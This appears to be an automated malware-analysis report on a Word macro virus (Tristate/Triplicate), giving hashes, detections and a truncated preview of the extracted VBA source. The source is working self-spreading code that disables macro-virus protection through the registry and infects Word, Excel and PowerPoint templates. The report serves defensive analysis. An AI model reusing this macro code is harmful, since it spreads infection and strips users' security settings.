Office (OLE) malware analysis — malicious · ca02f620e4d2041c

MALICIOUS

Office (OLE)

44.0 KB Created: 2319-07-25 23:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 9f7d1933a6c77686c6aff92f4b2fc1a7 SHA-1: ca37140b9fdc65ac30bde3d8444c60a8c5586469 SHA-256: ca02f620e4d2041cb523d6f80a890befbcfa9e77a61f19c04d28e10bd246a922

300 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Workbook_Open event, which is a common technique for executing malicious code upon document opening. The script uses CreateObject and GetObject calls, indicative of attempting to interact with other applications or system components to download and execute a payload. The ClamAV detections 'Win.Trojan.Tristate-2' and 'Doc.Trojan.Tristate-1' further confirm its malicious nature. The script also attempts to modify registry keys related to Excel's startup behavior, likely to establish persistence or influence its execution.

Heuristics 6

ClamAV: Win.Trojan.Tristate-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Tristate-2
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9480 bytes
SHA-256: `95ea0b78979f68d556eb0ae593b77dc8d7656dcd6eb1ea019c5c433e0a1922a9`
Detection ClamAV: Doc.Trojan.Tristate-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True '<!--1nternal--> 'Triplicate v0.21 /1nternal Private Sub Document_Close() On Error Resume Next Options.VirusProtection = False Options.ConfirmConversions = False Options.SaveNormalPrompt = False Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule Set TT = Templates(1).VBProject.VBComponents(1).CodeModule Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule If ad.Lines(1, 1) <> "'<!--1nternal-->" Then ad.DeleteLines 1, ad.CountofLines ad.InsertLines 1, TT.Lines(1, TT.CountofLines) If ad.Lines(1, 1) <> "'<!--1nternal-->" Then ad.InsertLines 1, nt.Lines(, nt.CountofLines) End If End If If nt.Lines(1, 1) <> "'<!--1nternal-->" Then nt.DeleteLines 1, nt.CountofLines nt.InsertLines 1, ad.Lines(1, ad.CountofLines) Set xlApp = CreateObject("Excel.Application") If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Check" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = "" System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = "Whoa" Set Book1Obj = xlApp.Workbooks.Add Book1Obj.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines) Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1." Book1Obj.Close End If xlApp.Quit Set PPObj = CreateObject("PowerPoint.Application") Set PBT = PPObj.Presentations.Open(Application.Path + "\..\Templates\Blank Presentation.pot", , , msoFalse) For Each ModComponent In PBT.VBProject.VBComponents If ModComponent.Name = "Triplicate" Then dontadd = True Next If dontadd <> True Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = "" System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\8.0\New User Settings\PowerPoint\Options", "MacroVirusProtection") = "" System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\PowerPoint\Options", "MacroVirusProtection") = "" Set NewMod = PBT.VBProject.VBComponents.Add(1) NewMod.Name = "Triplicate" NewMod.CodeModule.InsertLines 1, nt.Lines(1, nt.CountofLines) NewMod.CodeModule.ReplaceLine 118, "Sub actionhook(tristate)" Set ShapetoWack = PBT.SlideMaster.Shapes.AddShape(1, 0, 0, PBT.PageSetup.SlideWidth, PBT.PageSetup.SlideHeight) With ShapetoWack .Name = "Triplicate" .ZOrder (1) .Line.Visible = False .Fill.Visible = False .ActionSettings(1).Action = 8 .ActionSettings(1).Run = "actionhook" End With Set NewMod = Nothing PBT.Save End If PBT.Close PPObj.Quit End If If TT.Lines(1, 1) <> "'<!--1nternal-->" Then TT.DeleteLines 1, TT.CountofLines TT.InsertLines 1, nt.Lines(1, nt.CountofLines) End If End Sub Private Sub Workbook_Deactivate() On Error Resume Next Set AW = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule Set TW = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then Set WordObj = GetObject(, " ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.